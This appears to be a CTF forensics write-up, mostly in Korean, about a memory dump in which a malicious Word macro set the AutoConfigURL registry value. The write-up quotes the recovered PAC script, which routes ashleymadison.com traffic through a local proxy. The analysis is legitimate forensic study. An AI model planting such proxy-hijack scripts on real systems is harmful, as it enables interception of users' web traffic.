Malicious Word macro

Statement

I opened an exciting Word file, but I think I was wrong.Since then, a website dear to me does not work very well.
You have to find his favorite site. The validation password is the domain name of the website.
Uncompressed dump SHA256: 379a6a6ad73b390c5d556a34cc1bc0cb520e2589785ea27b658c88d3f83b9b19
메모리 덤프 이미지가 들어있다. 워드 파일이 인터넷에 대한 접근을 막았을 것이다.
pstree 를 보자
explorer 하위에 WINWORD.EXE 가 있는것을 확인할 수 있다. 저 프로그램 자체가 뭔가 이상한가 보다
덤프를 해봅시다
악성코드 분석하는 문제는 아닌가보다. 뭐가 없다.
메모리덤프도 해봅시다
관련해서 strings 분석해 보니까 Very Sexy.docm 파일을 연 기록이 보인다.
그럼 docm 관련 파일이 남아있는지 확인해 봅시다
원했던 파일이 남아있는 것을 확인할 수 있다
둘다 이제 word 파일 형태를 보이니까 기존에 있던 docm → 매크로 있는 워드파일 의 형태로 봅시다
바로 매크로가 있다는 경고가 뜬다
이제 이 매크로가 어떤 기능을 하는지 확인만 하면 될 거 같다.
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
에 어떤 값을 넣어준다.
‹function FindProxyForURL(url, host) { if (shExpMatch(url,"*.ashleymadison.com/*")) { return "PROXY 192.168.0.19:8080"; } return "DIRECT"; }����xÅQ���‹function FindProxyForURL(url, host) { if (shExpMatch(url,"*.ashleymadison.com/*")) { return "PROXY 192.168.0.19:8080"; } return "DIRECT"; }
Python
이런 코드가 있다.
보아하니 url이 ashleymadison.com 과 일치하는 경우에 리다이렉션을 해주는거 같음 ㅇㅇ
즉 고장나는 사이트는 ashleymadison.com 이다.
이상한 사이트 넣어놨노